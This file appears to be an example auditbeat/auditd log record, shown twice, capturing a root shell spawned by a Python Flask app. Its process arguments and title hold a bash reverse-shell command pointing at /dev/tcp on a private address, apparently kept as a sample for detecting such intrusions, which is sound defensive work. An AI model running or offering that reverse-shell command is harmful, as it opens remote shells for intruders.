dtrizna/auditd_example.json

## auditd_example.json
{
    "program_name": "auditbeat",
    "hostname": "k8s-minikube",
    "...",
    "auditd": {
        "message_type": "syscall",
        "summary": {
            "actor": {
                "primary": "root",
                "secondary": "root"
            },
            "how": "/usr/bin/dash",
            "object": { "primary": "/bin/sh", "type": "file" },
        "..."
        }
    },
    "process": {
        "args": [ "/bin/sh", "-c", "/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261" ],
        "executable": "/usr/bin/dash",
        "name": "sh",
        "parent": {
            "pid": 4171710,
            "process": {
                "executable": "/usr/bin/python3.8",
                "title": "python3 flask_app.py",
                "..."
            }
        },
        "pid": 4171711,
        "title": "/bin/sh -c /bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8888 0\u003e\u00261",
        "working_directory": "/var/www/app/"
    }
}
	{
	"program_name": "auditbeat",
	"hostname": "k8s-minikube",
	"...",
	"auditd": {
	"message_type": "syscall",
	"summary": {
	"actor": {
	"primary": "root",
	"secondary": "root"
	},
	"how": "/usr/bin/dash",
	"object": { "primary": "/bin/sh", "type": "file" },
	"..."
	}
	},
	"process": {
	"args": [ "/bin/sh", "-c", "/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261" ],
	"executable": "/usr/bin/dash",
	"name": "sh",
	"parent": {
	"pid": 4171710,
	"process": {
	"executable": "/usr/bin/python3.8",
	"title": "python3 flask_app.py",
	"..."
	}
	},
	"pid": 4171711,
	"title": "/bin/sh -c /bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8888 0\u003e\u00261",
	"working_directory": "/var/www/app/"
	}
	}